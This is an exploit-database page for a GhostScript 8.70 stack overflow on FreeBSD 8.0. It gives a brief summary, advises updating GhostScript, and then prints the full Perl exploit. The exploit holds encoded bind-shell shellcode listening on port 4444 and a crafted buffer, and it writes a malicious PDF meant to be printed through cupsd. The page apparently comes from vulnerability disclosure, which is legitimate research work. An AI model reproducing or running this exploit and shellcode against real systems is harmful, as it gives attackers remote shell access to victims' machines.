header-logo
Suggest Exploit
vendor:
GhostScript
by:
Rodrigo Rubira Branco
7,8
CVSS
HIGH
Stack Overflow
119
CWE
Product Name: GhostScript
Affected Version From: 8.70
Affected Version To: 8.70
Patch Exists: YES
Related CWE: N/A
CPE: a:artifex:ghostscript:8.70
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: FreeBSD 8.0
2010

Check Point Software Technologies – Vulnerability Discovery Team (VDT) – GhostScript Stack Overflow

Check Point Vulnerability Discovery Team (VDT) discovered a GhostScript 8.70 exploit for FreeBSD 8.0. The exploit is a 214 bytes shell_bind_tcp encoded with x86/alpha_upper. It creates an evil pdf with a buffer of 1200 bytes and appends the shellcode at the end of the buffer. The exploit is triggered when the pdf is opened.

Mitigation:

Update to the latest version of GhostScript.
Source

Exploit-DB raw data:

##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com>		 #
#									 #
# GhostScript Stack Overflow 						 #
#									 #	
##########################################################################

# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false, 
# PrependSetuid=false, LPORT=4444, RHOST=, 
# PrependSetreuid=false
my $buf = 
"\x54\x5a\xda\xd1\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43" .
"\x43\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x50\x31\x49\x50" .
"\x46\x30\x45\x38\x4b\x4f\x44\x42\x42\x31\x51\x4c\x4d\x59" .
"\x4b\x57\x50\x50\x43\x5a\x45\x51\x42\x4a\x44\x42\x42\x4a" .
"\x44\x50\x4e\x50\x45\x31\x48\x4d\x4b\x30\x51\x47\x46\x30" .
"\x46\x30\x43\x5a\x45\x38\x51\x48\x48\x4d\x4b\x30\x4d\x59" .
"\x51\x57\x4a\x4c\x48\x30\x43\x5a\x48\x4d\x4d\x50\x4e\x50" .
"\x45\x4e\x48\x4d\x4d\x50\x50\x50\x50\x50\x43\x5a\x51\x4a" .
"\x50\x58\x48\x4d\x4d\x50\x4b\x4f\x50\x4f\x4a\x44\x43\x49" .
"\x4b\x46\x46\x30\x42\x48\x46\x4f\x46\x4f\x44\x33\x42\x48" .
"\x43\x58\x46\x4f\x43\x52\x45\x39\x42\x4e\x4b\x39\x4b\x53" .
"\x46\x30\x46\x34\x50\x53\x50\x50\x48\x30\x47\x4b\x48\x4d" .
"\x4d\x50\x41\x41";

$pkt = "e!PS".
"A" x 500 . "00001111222233334444555556666777788889999aaa".
"\x40\xd9\xbf\xbf". #Shellcode Addr
"bccccddd".
"\xef\xbe\xbf\xbf".
"ffff".
"\xff\xbf" x 100 .
"C" x (1200 - length($buf)) . $buf . "Z" x 100; 

print STDERR "Check Point Vulnerability Discovery Team (VDT)\n";
print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0!\n";
print STDERR "Rodrigo Rubira Branco (BSDaemon)\n";

print STDERR "\nCreating evil pdf ...";

open(F,">crash.pdf");

print F $pkt;

close(F);

print STDERR " d0ne!\n";
print "Now print it via cupsd!\n";

Navigation

Suggest Exploit

Services By CQR